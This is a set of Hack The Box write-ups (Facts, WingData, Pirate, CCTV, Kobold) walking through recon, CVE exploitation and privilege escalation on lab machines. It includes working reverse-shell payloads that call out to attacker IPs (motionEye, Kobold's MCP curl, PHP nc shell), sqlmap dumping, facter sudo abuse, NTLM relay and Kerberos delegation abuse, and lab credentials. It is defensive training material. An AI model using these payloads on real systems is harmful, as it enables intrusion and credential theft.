|   GenericLines, Help, RTSPRequest, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 188FE84E9E3B613B
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Sat, 31 Jan 2026 19:43:22 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>188FE84E9E3B613B</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Sat, 31 Jan 2026 19:43:23 GMT
|_    Content-Length: 0

80/TCP - HTTP

gobuster

I then went ahead and used gobuster to enumerate the directories.

I headed over and tried to log in but failed, so instead went to the /register tab where I registered for an account.

Once inside I noticed at the bottom that it's running on Camaleon CMS - 2.9.0.

OSINT

I went ahead and started looking around for exploits:

Delving deeper into it we find that the founder of this CVE posted a short informational writeup on tenable:

CVE-2025-2304

So I head over and attempt to change the password, where I notice the Role is greyed out.

Then using this exploit I was able to exploit the vulnerability inside the password change:

Logging back in we notice that we now have Administrator privileges.

Heading over to the following page I found the AWS S3 info:

Exploitation

MinIO cli

In order to make use of this S3 bucket I downloaded mc:

wget https://dl.min.io/client/mc/release/linux-amd64/mc -O /usr/local/bin/mc && chmod +x /usr/local/bin/mc

Next up I created an alias:

mc alias set facts http://facts.htb:54321 AKIA8A8C1BCD91954B20 H6mMjKA49rX605mmBoJrrxURj8PIPRfb9EbuaIas

Once that was done I could issue commands:

I decided to check out the internal/ directory:

And lo and behold all the way at the bottom:

I copied over the ssh key

I then tried to identify the user to which this key belonged to, but unfortunately the username wasn't listed in authorized_keys:

Shortly after I noticed that the id_ed25519 key was actually encrypted with a passphrase, and I could decrypt it as follows:

Foothold

Shell as trivia

Combining all of the above we are able to log in:

However the user.txt flag was not inside this user's /home directory, but rather in william's. Luckily for us though we have read privs over the flag.

user.txt

Privilege Escalation

facter

Checking out the sudo privs I find the following:

using GTFObins I found the following:

We can get instant root privs by abusing this as follows:

mkdir /tmp/f
echo 'exec "/bin/bash"' > /tmp/f/pwn.rb
sudo facter --custom-dir=/tmp/f

root.txt

</PasswordProtect>

HTB-WingData

Maxim Andrei Koltypin — Tue, 17 Feb 2026 00:00:00 GMT

import PasswordProtect from '~/components/PasswordProtect.client';

Scope:
10.129.15.56

Recon

Nmap

sudo nmap -sC -sV -sT -p- -Pn -T5 --min-rate=5000 -vvvv wingdata.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.66
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: WingData Solutions
|_http-server-header: Apache/2.4.66 (Debian)
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

Heading over to the Client Portal tab we get redirected to another vhost which we need to add in order to access it.

Once added we can access it as follows:

I notice the software version and look it up.

Exploitation

CVE-2025-47812

There appears to be a Unauthenticated RCE exploit available:

I download the PoC and attempt to run it:

It appears to work flawlessly, let's get a reverse shell set up.

Shell as wingftp

I notice one other user to whom we need to move laterally:

Enumeration

While enumerating the directory we landed in we find the following:

among these files the audit_db sounds interesting so I download it over:

However nothing of use is found inside:

However looking further I did find a password for the server:

I was unable to crack the above hash however, so instead looked further:

This one was yet again uncrackable, but then I finally stumbled upon something

Inside this folder was the wacky.xml file, and this is a valid user on the ssh server.

Now all that's left is to crack the hash.

hashcat

I noticed that I had to use WingFTP as the salt so I appended it to my hash, then used hashcat to crack it:

wacky
!#7Blushing^*Bride5

Lateral Movement to Wacky

Using the cracked password we can log into the target:

user.txt

Privilege Escalation

CVE-2025-4138

Using sudo -l I noticed the following:

By analyzing the python file I found the following:

This can be exploited using CVE-2025-4138 for which there are plenty of PoC's, but I'll be using this one:

https://github.com//thefizzyfish//CVE-2025-4138_tarfile_filter_bypass

First I created a ssh key which I would transfer to the target in order to put it inside the /root/.ssh directory.

After creating and transferring the ssh key I went to work with the PoC:

I then transfer the backup to the correct folder:

Once the above is done I can connect using my id_rsa key:

root.txt

</PasswordProtect>

HTB-Pirate

Maxim Andrei Koltypin — Thu, 05 Mar 2026 00:00:00 GMT

import PasswordProtect from '~/components/PasswordProtect.client';

Scope:
10.129.244.95

Creds:
pentest
p3nt3st2025!&

Recon

Nmap

sudo nmap -sC -sV -sT -p- -Pn -T5 --min-rate=5000 -vvvv pirate.htb

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2026-03-05 13:41:38Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA/domainComponent=pirate
|_ssl-date: 2026-03-05T13:43:07+00:00; +6h59m57s from scanner time.
443/tcp   open  https?        syn-ack
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA/domainComponent=pirate
|_ssl-date: 2026-03-05T13:43:07+00:00; +6h59m57s from scanner time.
2179/tcp  open  vmrdp?        syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T13:43:07+00:00; +6h59m57s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA/domainComponent=pirate
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: pirate.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-05T13:43:07+00:00; +6h59m57s from scanner time.
| ssl-cert: Subject: commonName=DC01.pirate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.pirate.htb
| Issuer: commonName=pirate-DC01-CA/domainComponent=pirate
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49685/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         syn-ack Microsoft Windows RPC
49688/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  msrpc         syn-ack Microsoft Windows RPC
49914/tcp open  msrpc         syn-ack Microsoft Windows RPC
49940/tcp open  msrpc         syn-ack Microsoft Windows RPC
49964/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 65389/tcp): CLEAN (Timeout)
|   Check 2 (port 57669/tcp): CLEAN (Timeout)
|   Check 3 (port 53723/udp): CLEAN (Timeout)
|   Check 4 (port 21019/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m56s
| smb2-time: 
|   date: 2026-03-05T13:42:27
|_  start_date: N/A

In order to avoid clock skew errors I used the following commands to adjust the time to that of the target:

sudo timedatectl set-ntp true
sudo ntpdate -u 10.129.244.95
sudo timedatectl set-ntp false

NXC

I generated a krb5.conf file:

Then started my enumeration:

I also noticed some gMSA accounts:

My current user does not have READ permissions on them, so might need to take someone else over that does:

I tried spraying the machine accounts with the name - name combo and found a working one!

MS01$
ms01

BloodHound

Since I couldn't find anything else I booted up bloodhound

Be sure to use bloodhound-python instead of the CE version for querying here as that one will NOT work:

ReadGMSAPassword

Once all the necessary info has been gathered we can import it and start graphing the data.

I noticed that the MS01$ machine account was able to read the gMSA passwords so let's do that right away and get access via winrm with gmsa_adfs_prod:

gMSA_ADCS_prod$
304106f739822ea2ad8ebe23f802d078

gMSA_ADFS_prod$
8126756fb2e69697bfcb04816e685839

Foothold

evil-winrm as gMSA_ADFS_prod$

Nothing interesting stood out at first:

I did however find another IP address:

Which turned out to be WEB01:

Pivoting

Time to pivot to WEB01 and for this I'll be uploading the agent.exe binary from ligolo-ng:

I ping the WEB01 host to verify that everything works:

WEB01 enumeration

I started enumerating the host:

NTLM Relay

We can now use the following commands in order to exploit the printerbug coercion vulnerability:

printerbug pirate.htb/'gMSA_ADFS_prod$'@192.168.100.2 10.10.14.53 -hashes :8126756fb2e69697bfcb04816e685839
impacket-ntlmrelayx -smb2support --no-http-server -t ldap://dc01.pirate.htb --remove-mic --delegate-access

DMHFOLDE$
W.!wJVYi-;dTG9P

S4U2Proxy

Now we can export this ticket and use it to dump some passwords:

I found a cleartext password for the a.white user which appeared to be valid!:

a.white
E2nvAOKSz5Xz2MJu

Now we're getting somewhere:

We can use this account to ForceChangePassword the a.white_adm account, which is a member of the IT group.

Privilege Escalation

ForceChangePassword

I'll start off by changing the password, which can easily be done:

bloodyAD --host dc01.pirate.htb -d pirate.htb -u a.white -p E2nvAOKSz5Xz2MJu --dc-ip 10.129.244.95 set password a.white_adm 'Password123!'

Live SPN Jacking

We can find and remove the SPN for WEB01 in order to replace it with a malicious one afterwards.

impacket-findDelegation pirate.htb/a.white_adm:'Password123!'

Now remove it:

addspn -t 'WEB01$' -u 'pirate.htb\a.white_adm' -p 'Password123!' 'dc01.pirate.htb' -r --spn 'http/WEB01.pirate.htb'

Now we can add the SPN again:

addspn -t 'DC01$' -u 'pirate.htb\a.white_adm' -p 'Password123!' 'dc01.pirate.htb' --spn 'http/WEB01.pirate.htb'

We can then verify this again:

S4U2Proxy

And accordingly impersonate the Administrator of DC01 by abusing S4U2Proxy:

impacket-getST -spn 'http/WEB01.pirate.htb' -impersonate administrator 'pirate.htb/a.white_adm:Password123!' -dc dc01.pirate.htb

However we cannot use this yet:

tgssub

I exploited constrained delegation by impersonating the domain Administrator to obtain a Kerberos service ticket for HTTP on WEB01, then modified the ticket’s service field to CIFS on the domain controller, allowing me to authenticate to DC01 and execute commands as NT AUTHORITY\SYSTEM. This can be done with tgssub:

tgssub -in administrator@http_WEB01.pirate.htb@PIRATE.HTB.ccache -out Administrator.ccache -altservice "cifs/DC01.pirate.htb"

root.txt

user.txt

Afterwards I went looking for the user.txt flag since I couldn't find it on this machine. To make my life easier I dumped ntds using nxc so I can dump the Administrator hash of the domain:

The user.txt was then discovered within the a.white user's Desktop directory

</PasswordProtect>

HTB-CCTV

Maxim Andrei Koltypin — Thu, 12 Mar 2026 00:00:00 GMT

import PasswordProtect from "~/components/PasswordProtect.client";

Scope:
10.129.7.4

Recon

Nmap

sudo nmap -sC -sV -sT -p- -Pn -T5 --min-rate=5000 -vvvv cctv.htb

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.58
|_http-title: SecureVision CCTV & Security Solutions
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

80/TCP - HTTP

Heading over to the web server I find the following:

I head over to the Staff Login where I'm able to log in with default admin - admin creds into the ZoneMinder instance:

In the top right corner I notice the version number 1.37.63 which I look up:

Exploitation

CVE-2024-51482

On this github page I found the complete guide on how to exploit this instance:

We can go ahead and dump the password hash as follows:

sqlmap -u "http://cctv.htb/zm/index.php?view=request&request=event&action=removetag&tid=1" \
    --cookie="ZMSESSID=gkj6fc5hvi63avddv68krtpd1r" \
    -p tid --dbms=mysql --batch -D zm -T Users --dump

john

mark
opensesame

Foothold

SSH as Mark

With the found credentials we can easily log in as mark:

In order to fetch the user flag we'll have to move laterally to sa_mark however:

Enumeration

During enumeration I discover some internally facing ports:

In order to reach these I go ahead and upload a ligolo agent so I can port forward them.

Privilege Escalation

8765/TCP - HTTP

I can now view the ports such as 8765 which turns out to be the motionEye service:

In order to log in I need some creds, those of mark do not work here unfortunately.

I then tried to find the config file inside the file system:

While the motioneye.conf file wasn't useful, the motion.conf was:

admin
989c5a8ee87a0e9521ec81a79187d162109282f0

Using a meticulously crafted worlist I am able to retrieve the password:

admin
X1l9fx1ZjS7RZb

Using this password I can now gain access:

We can then exploit this as follows:

Next up we head on over to the Still Images tab where we will use the following reverse shell payload:

$(python3 -c "import os;os.system('bash -c \"bash -i >& /dev/tcp/10.10.14.155/443 0>&1\"')").%Y-%m-%d-%H-%M-%S

We then press Apply and now we can get the shell by using the following command:

curl "http://240.0.0.1:7999/1/action/snapshot"

root.txt

user.txt

</PasswordProtect>

HTB-Kobold

Maxim Andrei Koltypin — Thu, 26 Mar 2026 00:00:00 GMT

import PasswordProtect from '~/components/PasswordProtect.client';

Scope:
10.129.13.182

Recon

Nmap

sudo nmap -sC -sV -sT -p- -Pn -T5 --min-rate=5000 -vvvv kobold.htb

PORT     STATE SERVICE  REASON  VERSION
22/tcp   open  ssh      syn-ack OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     syn-ack nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to https://kobold.htb/
443/tcp  open  ssl/http syn-ack nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
| tls-alpn: 
|   http/1.1
|   http/1.0
|_  http/0.9
|_ssl-date: TLS randomness does not represent time
|_http-title: Kobold Operations Suite
|_http-server-header: nginx/1.24.0 (Ubuntu)
| ssl-cert: Subject: commonName=kobold.htb
| Subject Alternative Name: DNS:kobold.htb, DNS:*.kobold.htb
| Issuer: commonName=kobold.htb
3552/tcp open  http     syn-ack Golang net/http server
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-favicon: Unknown favicon MD5: F9C2482A3FE92BDB5276156F46E0D292
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest, HTTPOptions: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, no-store, must-revalidate
|     Content-Length: 2081
|     Content-Type: text/html; charset=utf-8
|     Expires: 0
|     Pragma: no-cache
|     Date: Thu, 26 Mar 2026 07:33:06 GMT
|     <!doctype html>
|     <html lang="%lang%">
|     <head>
|     <meta charset="utf-8" />
|     <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
|     <meta http-equiv="Pragma" content="no-cache" />
|     <meta http-equiv="Expires" content="0" />
|     <link rel="icon" href="/api/app-images/favicon" />
|     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, viewport-fit=cover" />
|     <link rel="manifest" href="/app.webmanifest" />
|     <meta name="theme-color" content="oklch(1 0 0)" media="(prefers-color-scheme: light)" />
|     <meta name="theme-color" content="oklch(0.141 0.005 285.823)" media="(prefers-color-scheme: dark)" />
|_    <link rel="modu

Accordingly I ran a ffuf vhost scan on both port 80 and 443.

ffuf

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://kobold.htb/ -H 'Host: FUZZ.kobold.htb' -mc all -fs 154 -fc 400

On port 443 I discovered the following 2 vhosts:

443/TCP - HTTPS

mcp.kobold.htb

I started looking around and found a PoC:

Foothold

CVE-2026-23744

Shell as ben

We can modify the PoC to get a reverse shell:

curl -k https://mcp.kobold.htb/api/mcp/connect \
  -H "Content-Type: application/json" \
  -d '{"serverConfig":{"command":"/bin/bash","args":["-c","bash -i >& /dev/tcp/10.10.15.79/443 0>&1"],"env":{}},"serverId":"mytest"}'

user.txt

bin.kobold.htb

To get to root however we'll need to move onto the next vhost:

It appears to be a PrivateBin instance which appears to be running on version 2.0.2.

CVE-2025-64714

I did some searching and found a CVE for it:

We can test this out as follows:

echo '<?php phpinfo();?>' > pwn.php

Since I noticed a docker interface earlier we might need to point a shell towards that interface:

echo '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 172.17.0.1 9001 >/tmp/f");?>' > shell.php

The CVE writeup mentioned the following file so it's worth taking a look:

Inside I found the following:

privatebin
ComplexP@sswordAdmin1928

3552/TCP - HTTP

Moving on I went to the last open port which was running Arcane 1.13.0:

I tried multiple usernames until arcane seemed to work with the password:

We can now create a container which will run under the root user:

Now we can click Create Container.

Next up we head over to the container and click on Shell:

root.txt

</PasswordProtect>